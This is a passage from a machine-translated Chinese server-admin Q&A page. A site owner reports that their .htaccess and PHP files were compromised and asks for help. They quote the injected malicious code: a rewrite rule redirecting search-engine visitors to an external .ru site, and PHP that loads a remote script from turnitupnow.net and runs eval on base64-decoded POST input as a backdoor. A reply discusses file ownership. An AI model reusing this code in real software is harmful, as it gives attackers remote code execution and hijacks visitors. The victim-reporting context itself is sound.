服务器 Gind.cn
  1. 服务器 Gind.cn
  3. .htaccess文件被入侵
Intereting Posts
覆盖整个IISconfiguration Solaris 8 – 目录不见了; 这是清理脚本的罪魁祸首? Microsoft Security Essentials:MpCmdRun.exe -SignatureUpdate -unc切换不起作用 Nginx的权限问题 GPO不立即应用 – 正常行为? 适用于Windows 7的“模块化”部署工具? 生产服务器上发生“405方法不允许”,在开发服务器上正常 Web服务器(IIS)和数据库镜像(Postgresql) 如何使用nginx分隔子页面以指向不同的nodejs服务器 将1000万张图像复制到另一个服务器上 我如何驱除在安装后脚本崩溃的特定Ubuntu软件包? 在多个linux服务器之间共享ENVvariables 目标UID(99)和文件的UID(XX)之间不匹配 设置一个域名来使用主机头 XenServer – 从机箱中卸下刀片服务器

.htaccess文件被入侵

我有一个托pipeDreamhost的网站,我的.htaccess文件的内容一遍又一遍地被攻破。 有人把这样的东西放在我的代码前面: 

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://float-answer.ru/access/index.php

该文件的chmod是744.从文件的最后修改时间,我可以估计什么时候发生了攻击。

没有任何东西似乎在网站上受到攻击。

我已经更改了所有相关的密码。

编辑:这似乎更糟! 这个代码已经注入了几个php文件: 

 global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

chmod 744意味着你的htaccess可以被拥有该文件的人访问。 那个文件是由www-data拥有的吗? 如果是这样,我怀疑你自己的PHP代码正在被用来妥协的数据。 如果你的sshd或其他东西被盗用,更改你的密码不会帮助你。 你拥有这台服务器吗? (或托pipe,虚拟还是租用?)您使用的是哪种发行版? (我认为这是Linux)